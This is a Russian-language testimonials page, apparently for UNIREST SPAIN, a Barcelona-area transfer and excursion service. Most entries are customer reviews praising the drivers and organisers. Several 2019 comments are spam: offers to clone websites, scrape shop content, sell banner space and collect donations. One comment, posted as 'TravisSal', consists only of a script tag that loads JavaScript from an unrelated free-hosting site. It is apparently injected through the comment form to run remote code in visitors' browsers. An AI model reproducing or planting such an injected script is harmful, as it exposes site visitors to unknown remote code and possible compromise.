Главная \ Отзывы

Отзывы



Neoososte, Kampala 08.11.2019 06:20
Здесь вы можете заказать копию любого сайта под ключ, недорого и качественно, при этом не тратя свое время на различные программы и фриланс-сервисы.

Клонированию подлежат сайты как на конструкторах, так и на движках:
- Tilda (Тильда)
- Wix (Викс)
- Joomla (Джумла)
- Wordpress (Вордпресс)
- Bitrix (Битрикс)
и т.д.
телефон 8-996-725-20-75 звоните пишите viber watsapp
Копируются не только одностраничные сайты на подобии Landing Page, но и многостраничные. Создается полная копия сайта и настраиваются формы для отправки заявок и сообщений. Кроме того, подключается админка (админ панель), позволяющая редактировать код сайта, изменять текст, загружать изображения и документы.

Здесь вы получите весь комплекс услуг по копированию, разработке и продвижению сайта в Яндексе и Google.

Хотите узнать сколько стоит сделать копию сайта?
напишите нам
8-996-725-20-75 звоните пишите viber watsapp

parsingpars, Saint-Petersburg 05.10.2019 01:35
Автоматическое наполнение интернет-магазинов.
Автоматическое наполнение контентом сайтов.
Парсинг карточек товаров интернет-магазинов (автоматический сбор).
Парсинг статей и контента сайтов.
Наполнение любых движков сайтов.
Импорт Номенклатуры в 1С с любого сайта.
Создание интернет-магазинов 8 тыс р
Скайп anato27 . тел/вайбер/вотсап +79818525114


Automatic filling of online stores.
Automatic content filling sites.
Parsing cards of goods of online stores (automatic collection).
Parsing articles and site content.
Filling any website engines.
Skype anato27. Tel / Viber / WhatsApp +79818525114

Денис 24.09.2019 15:16
Перезвоните мне пожалуйста 8(999) 529-09-18 Денис.

Tania36755, Moscow 24.09.2019 08:33
Всем привет!

VVAvtokHon, Екатеринбург 06.09.2019 19:53
РАЗМЕСТИТЬ БАННЕР за "копейки"(цена совсем смешная, символическая) на транспортной баннерной доске(только сайты транспортной и около-транспортной тематики, никаких гербалайфов, адалтов, варезов и т.п. шлака)!

У Вас в собственности или управлении сайт на тему авто-мото-транспортна(например: автосалон, автообзоры, сто, автомагазин, грузоперевозки, такси...)
Вы имеете возможность повешать свой баннер, тем самым получить ссылку с тематической площадки...
<img src="http://images.vfl.ru/ii/1558146350/8e5315a5/26571433.jpg">
Что ВАЖНО отметить - купить место под баннер можно довольно недорого(почти даром), при этом заплатив 1 раз - Вы получаете "ПОЖИЗНЕННОЕ" размещение.
Подробней можно ознакомиться непосредственно #avkto.ru в разделе правил на баннерной доске
Кроме того, профиль Вашей организации на доске баннеров - станет дополнительным плюсом в продвижении сайта вашей компнии, если умело использовать его.
Цена - Вам понравится! #БАННЕРНАЯ РЕКЛАМА

http://images.vfl.ru/ii/1558146538/bf2f4ff5/26571447.jpg</img> - разместите свой баннер на авто-транспортной баннерной доске...]
http://images.vfl.ru/ii/1558146350/8e5315a5/26571433.jpg</img> - разместите свой баннер на авто-транспортной баннерной доске ...]
http://images.vfl.ru/ii/1558146538/f28cfc1c/26571449.jpg</img> - разместите свой баннер на авто-транспортной баннерной доске...]

PavelAlxHon, Tyumen 31.07.2019 20:50
Базе для охотников и рыбаков, туристов и всех любителей активного или не очень активного отдыха на свежем воздухе, располагающейся территориально в Тюменской области, Нижнетавдинском райое, ву д.Иска требуется любая финансовая помощь всех желающих! Необходимо успеть в срок до 31 августа 2019 года провести текущие, а от части и капитальные ремонты и частичный закуп для: гостевых избушек, бани, сауны, трактора, снегоходов, квадроциклов, уаза, лодок, так же не помешал бы новый закуп кормов и витаминов для собак и лошадей. Всем неравнодушным будет начислен приятный бонус при заезде на базу! А для ОСОБО-отличившихся в благотворительности, предусмотрено 3 бесплатных заезда! Для охотников: водоплавающая и боровая дичь , копытные , зайцы, лисы, ондатр, бобры и мн.др., для рыбаков : щука, карась, плотва, окунь, лещ, линь, судак, ерш и др, для туристов: велосипеды, палатки (гитара тоже есть, но ее редко берут), лыжи и продуманные маршруты... Мы всегда рады любой Вашей помощи! Помогая нам, Вы можете считать себя ИНВЕСТОРОМ в прекрасном(благом и полезном) деле - т.к. в планах и отчасти уже реализовано: зарыбление ближайших водоемов; проведение экологических меропритий на територии Нижнетавдинского р-на, а также экологический десант в любой район Тюменской области и Тюменсокго Севера(Югра, Ямал); посильная помощь охотоведам/региональным заказникам и заповедникам в восстановлении популяций фауны и флоры; разведение/дресеровка/натаска охотниче-промысловых и служебных собак(нашим гостям всегда сможем помочь с выбором и записью на очередь щенков: зс/вс/ре лаек, анг/шот/ирл сеттеров, русских спаниэлей, немо, вео и сао); и др. общественно-полезные мероприятия экологической направленности.


<img src="http://images.vfl.ru/ii/1563104124/ea5c8612/27201243.jpg">


Для желающих помочь материально(любая поддержка, даже 456 руб. будет полезна) и после этого отдохнуть в живописном месте у речки + получить некоторыйй при заезде на базу - yasobe.ru/na/uspet_do_31_avgusta

TravisSal, Jbeil 08.06.2019 20:10
<script type="text/javascript" src="https://heliotypic-edges.000webhostapp.com/js.js"></script>

Елена, Санкт - Петербург 25.05.2018 20:08
Хотим выразить огромную благодарность Марии, Олегу и Андрею!!!!! Андрей встретил, все рассказал, отлично довёз до Ситжеса и очень помог с заселением в Аппартаметы. Без него нам было бы трудно встретиться с хозяйкой и найти общий язык. Андрей. Проводил, все объяснил, перевёл с испанского на родной))) большое ему спасибо!!!! Мария отвечала на письма моментально. Олег, интеллигентный, образованный человек, скрасил нашу поездку в аэропорт интересной беседой!!! Процветания вашему бизнесу! И надеемся на новую встречу.

Emma, Kiriat Shemona, Israel 17.04.2018 16:04
Дорогие Олег и Мария,
Очень приятно, что есть такие люди как вы- на которых можно полностью положиться, которые уважают свою работу, приветливые, открытые и тактичные! Мы были очень довольны тем, как нас встретил Олег, отвез в Ла Гарригу и обратно, когда мы возвращаись. Олег сопровождал нас до самой стойки регистрации на рейс- вот такая ответственность и забота! Машина замечательная, поездки были равнозначны экскурсиям. Мария организовала все четко, на каждое обращение мы получали немедленный ответ. Можем дать самые лучшие рекомендации этим людям и этой компании. Спасибо большое за такое особенное отношение. Приезжайте к нам! Емма и Леня.

Эльдар, Баку 22.02.2018 21:51
Огромное спасибо Марии и Олегу! Приятно удивили теплым приемом гостей из солнечного Баку. Организация поездки в Андору была четкой, посмотрели все достопримечательности и получили детальные описания. Удачи во всех начинаниях!

Ясна, Москва 20.01.2018 00:53
Огромное спасибо Марие и Олегу. Приятные, вежливые, пунктуальные! Помогли с поездкой для нашей компании в несколько человек. Оперативно ответили, были доброжелательны, внимательны и вообще самые высокие рекомендации! Огромное спасибо!

Ирина, Москва 14.01.2018 11:39
Спасибо большое Марии и Олегу! Очень приятное обслуживание и отношение к своим клиентам. Ездили на экскурсию в Монсеррат, без гида, но по дороге Олег практически рассказал нам историю монастыря и много чего полезного. Поэтому решили заказать трансфер до аэропорта тоже в этой компании. Рекомендуем всем эту компанию так как сотрудники компании очень порядочные, пунктуальные и доброжелательные!!!!! Те же услуги в испанских компаниях дороже. Так что цена качество отличное!! Ирина, Эдуард, Константин

Марина , Берлин 12.01.2018 17:14
Отдыхали на новогодних каникулах в Салоу. Спасибо Олегу и Маше за помощь. В последний момент возникли проблемы с арендой автомобиля. Случайным образом нашли ребят. И остались более чем довольны. Оперативно быстро решили нашу транспортную проблему. И мы не раздумывая, сразу заказали трансфер на обратную дорогу. Хочу отметить не только качественную работу, но и приятную компанию. Олег очень интеллигентный, приятный собеседник. Дети завалили его вопросами во время пути. Интересно было всем. Спасибо большое! Летом решено вернуться в Испанию на каникулах. Надеемся встретиться снова! Успехов вам в работе, ребята!

Ирина и Максим , Москва 08.01.2018 12:21
Отдыхали в Паз де Ла Каса. Прекрасное катание. Олег всегда пунктуален. Пользовались трансфером туда и обратно.

Евгения, Хакасия 20.12.2017 14:31
Спасибо Марии за великолепное предложение для земляков . Мы уже успели воспользоваться.
Отдыхали с мужем в Барселоне и решили поехать в Андорру, начали искать доступное такси, и нашли отличное предложение Марии и Олега с заездом на Монтсеррат. Спасибо вам за отличный сервис и доступные цены. Олегу отдельное спасибо за интересную историю о Монтсеррат. Мы в восторге от Андорры, а в Барселону хотим вернуться ещё летом. Надеемся у вас ещё будут эти спец . предложения для Красноярска и Абакана!

Вадим, Москва 05.09.2017 12:30
С 20.08 по 31.08 были в Lloret de mar. Олег прекрасно встретил и проводил. Приятно пообщались с ним по дороге из аэропорта и обратно. Время пролетело пулей. Очень довольны!

Григорий Калинко, Wörth am Rhein 04.09.2017 17:51
Были в Салоу с 20 августа.Заранее согласовали наш трансфер. Несмотря на сложности(инвалидная коляска) все прошло четко и профессионально...Олег, Мария-огромное спасибо.Всем кто интересуется-рекомендуем.. Без проблемная доставка и четкие,. профессиональные ответы на интересующие вопросы..

Ектерина, Санкт-Петербург 30.08.2017 04:10
Спасибо большое Олегу и Марии!Отправляясь в отпуск с двумя детьми,хочется быть уверенным во всём,что это будет вовремя и надежно,это про UNIREST SPAIN!Чёткая подробная информация на почту сразу после заказа,2 автомобильных детских кресла по возрасту(что важно),доступная цена и просто интересное общение!С удовольствием еще приедем к вам

Александр, Москва 15.08.2017 10:42
Большое спасибо Олегу и Марии за организацию трансферов нашей семьи (групповых и индивидуального) из а/п Барселоны в отель в Ла Пинеде и обратно в июле 2017 г.! Всё было организовано очень профессионально, пунктуально и комфортно, а Олег оказался очень приятным в общении человеком! С удовольствием ещё воспользуюсь их услугами.

Марина, Киев 14.08.2017 21:56
Мы с супругом отдыхали в Ла Пинеда. Ещё в Киеве связались по электронной почте с Машей и Олегом по вопросу организации трансфера в Барселону для поездки на Камп Ноу на матч Барселона- Реал. Буквально сразуполучили ответ в почте, через несколько минут Олег набрал нас по Вайберу и мы смогли обо всем договориться. Олег, искреннее спасибо Вам за очень комфортный трансфер. После матча дороги превратились в реки болельщиков Барсы . Олег связался с нами по телефону и встретил нас у входа , чтобы проводить к машине. По дороге мы узнали не только о том, что можно посмотреть в Тарагоне и Барселоне , но и что стоит попробовать из вин и сыров. Мы ещё наслаждаемся отдыхом . Спасибо вам ребята за комфорт. Всем рекомендую.

Жанна, Алматы 10.08.2017 06:21
Благодарю Марию за быстрые ответы по запросу! Вежливо, лаконично! Три дня была по бизнесу в Барселоне в начале августа.Трансферт в Барселоне идеален: из-за огромной очереди на паспортном контроле мы задерживались - Олег ждал необходимое время. Авто чистое, в прекрасном состоянии. Олег вежлив, корректен, очень пунктуален! Великолепный сервис! Прекрасные адекватные цены! Рекомендую!

Евгения, Санкт-Петербург 29.07.2017 20:44
Заказывали индивидуальный трансфер из аэропорта до Торредембаре и обратно. Остались в восторге от предоставляемого сервиса. Машина всегда во время,водители вежливые,для детей были предоставлены кресла по возрасту. Рекомендую всем. Марии и её коллегам огромное спасибо

Дмитрий 14.07.2017 19:27
Воспользовались услугами по трансферу в Ллорет. Олег встретил в аэропорту и комфортно доставил в отель, который в центре города (кто был в Ллорете понимает, что там даже на легковом авто не просто бывает припарковаться). Было приятно с ним прокатиться.

Ирина, Новосибирск 07.07.2017 05:52
Мы в основном живём в Испании и часто пользуемся услугами ребят.
Помимо трансферов, хочу отметить услуги перевода, консалтинговую поддержку и просто ответа и поиска ответов на любые вопросы.
Мария нам делала перевод свидетельства о рождении ребёнка с испанского языка на русский, для предъявления в Консульство РФ. Все приняли и заверили безоговорочно.
Заказывали магов на день рождения дочки.
Также, мы часто уезжаем, и постоянно пользуемся услугой закупки продуктов и подготовки дома к нашему приезду.
Людям 100% можно доверять.
Очень отзывчивые и позитивные ребята, готовые помочь в любую минуту.

Татьяна , Кассель, Германия 15.06.2017 18:13
Только что вернулись из Салоу. Отдыхали без путёвок, сами организовывали все. В этот раз воспользовались услугами Марии и Олега. Поездка до Салоу совершенно не утомила, по дороге даже выпили кофе. Автомобиль комфортный. На все поездки ребёнку было предоставлено нормальное (по возрасту) детское кресло. В службах такси нам два раза предоставляли кресло на детей от 5 лет. Ребёнку 2. Было весьма неудобно.
Из Салоу ездили с Олегом на Монтсерат, потом катались по Барселоне. На Монтсерате Олег нам провёл экскурсию. Было очень интересно. И главное, столько по времени, сколько мы хотели! Когда ребёнок устал и закапризничал, мы поехали обратно. В общем, нам очень понравилось. Олег в аэропорту нам помог со всем. Спасибо большое ребятам за хорошо организованный сервис. Все быстро, качественно и четко. Мы обязательно вернёмся!

Артур Гавриленко, Санкт-Петербург 10.06.2017 20:27
Я регулярно провожу анализ цен. Здесь лучшие расценки на трансфер. Третий год подряд пользуюсь. Путешествуем семьёй (6 человек), всегда куча вещей. Олег вовремя встречает, помогает, подсказывает. Доводит всегда чётко до места.
Например, помогает быстро найти отдел TAX FREE, стойки регистрации итд
Всё вовремя, чётко, надежно. Авто - мерседес, качественный, вместительный.
И Мария, и Олег - очень приятные в общении, интеллигентные, всегда готовы помочь!
Спасибо! До следующего раза!

Елена и Василий, Красноярск 31.05.2017 08:36
В Барселоне мы пользовались двумя службами такси. С уверенностью, можем сказать, что UNIREST SPAIN вне конкуренции. Для нас ценно,когда машина чистая, без посторонних запахов,водитель корректен,вежлив и пунктуален. В UNIREST SPAIN это гарантированно. Цена поездки известна сразу,машина подаётся немного раньше времени. Нас встречал Олег. Прекрасный,образованный и очень интересный человек. Знающий историю и любящий Барселону и Испанию. Это очень ценно,когда помимо сервиса ещё и приятная и познавательная беседа. В следующий приезд обязательно съездим на экскурсии по Испании именно с Олегом. Олег оказал нам неоценимую услугу. Наша авиакомпания,без предупреждения перенесла вылет из терминала 2 в терминал 1. Мы в полной уверенности едем в терминал 2(не посмотрев онлайн табло вылетов:),благо в запасе 2 часа. Понятно,что мы могли добраться сами. Но Олег,всё уточнил и отвёз нас в нужный терминал. Сомневаюсь,что другая служба такси поступила бы также. Привезли бы и всё. Понятно,что мы бы добрались сами,взяв такси во 2 терминале. Но это же время и лишние волнения. Вот такие моменты характеризуют человека и в целом службу такси. В общем,не равнодушные.Олег помог выгрузить багаж, убедился,что рейс состоится и только тогда уехал. Огромное спасибо!!! При прощании нам подарили чудесный магнитик Барселоны,с данными службы такси.

Хотим ещё отметить службу поддержки. Отличная работа,быстрые ответы на почту.

Как рекомендация,больше ВАМ рекламы в инете,проспектах. Со своей стороны будем рекомендовать Вас друзьям и знакомым. С уважением. Елена и Василий

Ольга , Санкт-Петербург 11.05.2017 11:42
Осенью отдыхали с подругой и детьми. Обратно решили ехать на такси. Никогда не думала, что найти подходящего человека в Испании будет так сложно. Обзвонила несколько контактов, ни с кем не договориться.
Стала искать в интернете.
Олег оказался нашим спасителем. Кроме того, он помог добраться с вещами и детьми до стойки и регистрации и удостоверился, что все в порядке.
Всем буду рекомендовать и сами ещё раз при случае будем обращаться только к Олегу.

Николай, Санкт - Петербург 05.05.2016 02:08
Заказывали трансфер аэропорт - Кубельес и обратно. все прошло ОТЛИЧНО! Олег встретил, помог, все рассказал.
Всем будут рекомендовать.

Роман, Москва 24.04.2016 13:22
В июле 2015 пользовались услугами трансфера из аэропорта Барселоны. Все прошло отлично, не смотря на задержку рейса. При бронировании гостиницы у нас вышла небольшая накладка, Олег помог подыскать другой отель. Спасибо! Всем рекомендую!

*Имя:


Город


E-mail:


*Текст: